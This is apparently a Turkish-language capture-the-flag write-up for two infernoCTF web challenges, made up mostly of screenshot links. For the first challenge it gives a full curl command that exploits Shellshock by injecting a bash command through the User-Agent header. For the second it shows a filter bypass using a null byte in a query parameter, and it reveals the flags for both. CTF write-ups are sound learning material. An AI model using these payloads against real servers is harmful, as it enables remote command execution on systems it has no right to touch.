1-
![xlf1u4.png](https://resmim.net/f/xlf1u4.png)
we will we will shock you
![YmQimw.png](https://resmim.net/f/YmQimw.png)
Siteye giriş yaptığımızda apache2'nin default sayfası karşımıza geliyordu .
![In2z72.png](https://resmim.net/f/In2z72.png)
Siteye ctrl+u ile bakınca bashferno.cgi olduğunu görüyorduk .
![nLqZoQ.png](https://resmim.net/f/nLqZoQ.png)
/bashferno.cgi dosyasında bizi bir shellshock zafiyeti bekliyordu .
![Sb1qn7.png](https://resmim.net/f/Sb1qn7.png)
curl -H "user-agent: () { :; }; echo ; echo; /bin/bash -c 'cat flag_for_this_INFERNO.txt'" http://104.197.168.32:17012/bashferno.cgi curl ile flagımızı alıyorduk . FLAG: infernoCTF{F33l_Th3_Sh0ck}
-----------------------------------------------------------------------------------------------------------
![UHNftd.png](https://resmim.net/f/UHNftd.png)
Dante's Personel Home Page
![1mQUlx.png](https://resmim.net/f/1mQUlx.png)
Siteye girince bizi bu şekilde bir anasayfa karşılıyor .
![4aKayU.png](https://resmim.net/f/4aKayU.png)
_ gibi karakterler yasak olduğu için .. yapıyoruz . ?..magic..=
![wXarEO.png](https://resmim.net/f/wXarEO.png)
tht%00$dark$ yaparak flagımızı alıyoruz . FLAG : infernoCTF{1_gu3ss_y0ur_m4g1c_was_w4y_t00_d4rk}